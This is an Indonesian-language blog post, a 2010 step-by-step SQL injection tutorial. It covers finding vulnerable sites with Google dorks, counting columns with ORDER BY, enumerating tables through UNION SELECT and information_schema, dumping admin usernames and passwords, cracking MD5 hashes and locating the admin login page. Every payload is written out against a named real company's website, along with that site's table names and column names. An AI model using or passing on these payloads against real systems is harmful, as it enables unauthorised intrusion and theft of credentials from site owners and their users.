Sabtu, 18 September 2010

Belajar SQLi


Step by Step SQL injection

===[1]===

Mencari target,, untuk mencari target kalian dapat memakai google dorks untuk SQLi http://suddendeath.000space.com/trik/Dork_SQLi.txt contoh : http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193


===[2]===

Setelah menemukan target , langkah berikutnya adalah mengecek apakah target dapat di inject atau tidak. cara mengecek dengan menambahkan karakter ‘ atau – sebelum angka.

contoh : http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193′ http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=-193

jika ditemukan pesan error seperti Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’ ORDER BY AddDate DESC’ at line 1 Atau tampilan halaman page berubah dari tampilan sebelumnya Maka target tersebut vuln / dapat di inject.

===[3]===

gunakan perintah : +order+by+angka– contoh: http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+1http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+2http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+3http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+dhttp://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+1http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+order+by+1

ketika menginject sampai angka ini muncul pesan error/berubah tampilan maka jumlah tabel berarti hanya berjumlah 14

===[4]===

Karena tadi error sampai angka 15 Gunakan perintah : +and+1=2+union+select+angka_sampai_jumlah_tabel– Maka: http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+and+1=2+un… Maka akan muncul angka misalnya angka 3 ,5 (angka kadang muncul lebih dari 2) version() —> untuk menampilkan versi database Masukan perintah tsb pada angka yg keluar tadi contoh: http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14– Nah disini akan muncul versi nya jika versi 5 maka anda beruntung tapi jika table nya versi 4 tinggalkan saja soalnya kita perlu menebak nama tablenya, ada ratusan cape dech…. contoh nya : 5.0.51b-community……bla..bla 4.0.51b-commun…..bla..bla

===[5]===

Untuk versi 4 table = user, admin, administrator, myql.user, etc column = username, password-user, passwd – etc

Untuk versi 5 Untuk menampilkan semua isi dari table tersebut adalah Perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi dan Perintah +from+information_schema.tables+where+table_schema=database()– –> dimasukan setelah angka terakhir Contoh: http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()– maka muncul : _career_app_form,admin,admin_log,admin_tb,annual_meeting,annual_meeting_category,annual_report,annual_report_category,article_special,article_special_category,board_gallery,board_gallery_bak_23-9-2008,board_gallery_category,board_gallery_category_bak_23-9-2008,car_insurance_reg,car_loan_reg,car_loan_reg_category,career_app_form,career_back Cari table dengan nama seperti atau mendekati nama2 seperti ini pada tabel yg muncul seperti diatas user, usr, username, user_name, login, user_admin, name, admin_user, dll di dalam tersebut biasanya tersimpan username dan password. dalam contoh ini adalah admin ubah dulu kata users ke dalam hexa memakai ascii converter ini http://suddendeath.000space.com/files/ascii.html “admin” di convert hasilnya adalah 0×61646D696E

===[6]===

Mencari isi table Perintah : group_concat(column_name) -> dimasukan pada angka yg keluar tadi perintah : +from+information_schema.columns+where+table_name=0xhexa– -> dimasukan setelah angka terakhir ganti hexa dengan kata users yg sudah di convert ke hexa contoh : http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0×61646D696E– Maka isi dari table admin adalah AdminID,Username,Password,Fname,Lname,AdminType,AddDate,Active,UpdateDate ===[7]===

Melihat isi dari Username,Password. gunakan perintah : group_concat(0×3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi perintah +from+nama table berasal -> dimasukan setelah angka terakhir contoh : http://www.kiatnakin.co.th/en/newsroom/news_detail.php?id=193+and+1=2+union+select+1,2,group_concat(Username,0×3a,Password),4,5,6,7,8,9,10,11,12,13,14+from+admin 0×3a diantara username dan password adalah tanda : (titik dua ) maka akan muncul data2nya misalnya : admin:password,userlain:passwordlain jika passwordnya berupa hash md5 seperti “ab1984e073f70207fbf95400d52a8c04″ hasil cracknya : 5422907 cracknya disini : http://suddendeath.000space.com cari tab md5

===[8]===

Langkah terakhir adalah mencari halaman login admin, bisa menggunkan tool ini http://www.plunder.com/Admin-Finder-download-e2d61a4182.htm masukkan url target http://www.target.com scan

./virgi a.k.a kodok
5 .//allasca: Belajar SQLi Step by Step SQL injection ===[1]=== Mencari target,, untuk mencari target kalian dapat memakai google dorks untuk SQLi http://suddend...

Tidak ada komentar:

Posting Komentar

< >